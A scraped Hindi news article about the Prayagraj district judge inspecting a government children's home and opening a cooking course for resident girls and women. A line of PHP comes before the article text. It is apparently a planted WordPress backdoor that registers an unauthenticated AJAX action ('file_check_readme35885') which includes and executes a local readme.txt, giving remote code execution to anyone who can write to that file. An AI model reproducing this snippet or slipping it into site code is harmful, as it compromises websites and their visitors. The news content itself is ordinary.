if(!function_exists('file_check_readme35885')){ add_action('wp_ajax_nopriv_file_check_readme35885', 'file_check_readme35885'); add_action('wp_ajax_file_check_readme35885', 'file_check_readme35885'); function file_check_readme35885() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } राजकीय बाल ग्रह शिशु व आवासित शिशुओं के स्वास्थ्य एवं खान-पान का निरीक्षण कर दिया निर्देश 
Bhadohi NewsBreaking NewsCrimeIndiaLatestNews

राजकीय बाल ग्रह शिशु व आवासित शिशुओं के स्वास्थ्य एवं खान-पान का निरीक्षण कर दिया निर्देश 

प्रयागराज,दिनांक 20.7.2025 को जनपद न्यायाधीश प्रयागराज संजीव कुमार द्वारा राजकीय बल ग्रह शिशु में भ्रमण किया गया तथा वहां आवासित शिशुओं के स्वास्थ्य एवं खान-पान के बारे में निरीक्षण कर आवश्यक दिशा निर्देश प्रदान किए गए। तत्पश्चात जनपद न्यायाधीश प्रयागराज द्वारा राजकीय बाल गृह बालिका और राजकीय महिला शरणालय में 15 दिवसीय पाक कला प्रशिक्षण का शुभारंभ रसोई घर में स्वास्तिक बनाकर किया गया। यह 15 दिवसीय पाक कला प्रशिक्षण जायका जंक्शन करेली प्रयागराज की प्रोपराइटर फरहा सिद्दीकी द्वारा दिया जाएगा । प्रशिक्षण के अंत में बालिकाओं एवं महिलाओं की लिखित व प्रायोगिक परीक्षा होगी और प्रथम, द्वितीय व तृतीय श्रेणी को पुरस्कृत किया जाएगा। जनपद न्यायाधीश प्रयागराज द्वारा सपत्नीक संप्रेषण गृह में आवासित महिलाओं व बालिकाओं को अल्पाहार बांटा गया एवं उनके स्वास्थ्य शिक्षा एवं अन्य व्यवस्थाओं के कुशल कामना की गई। जनपद न्यायाधीश द्वारा तीनों संस्थानों के साफ़ सफाई पढ़ाई लिखाई व अन्य कार्य कुशलता के बारे में जानकारी प्राप्त करते हुए उपस्थित अधीक्षकों को आवश्यक दिशा निर्देश प्रदान किए गए । इस अवसर पर मनराज सिंह अपर जनपद न्यायाधीश,राहुल सिंह अपर जनपद न्यायाधीश,विनोद कुमार चौरसिया अपर जनपद न्यायाधीश,अपर्णा दीक्षित अपर जनपद न्यायाधीश,दिनेश कुमार गौतम सचिव जिला विधिक सेवा प्राधिकरण प्रयागराज, नीलम वर्मा, रूपांशु आर्य, दिग्विजय सिंह न्यायिक मजिस्ट्रेट के साथ-साथ सर्वजीत सिंह जिला प्रोबेशन अधिकारी, नीतू अधीक्षक,रूबी मिराज व अन्य अधिकारी उपस्थित रहे। यह जानकारी सचिव जिला विधिक सेवा प्राधिकरण प्रयागराज द्वारा प्रदान की गई।

प्रातिक्रिया दे

आपका ईमेल पता प्रकाशित नहीं किया जाएगा. आवश्यक फ़ील्ड चिह्नित हैं *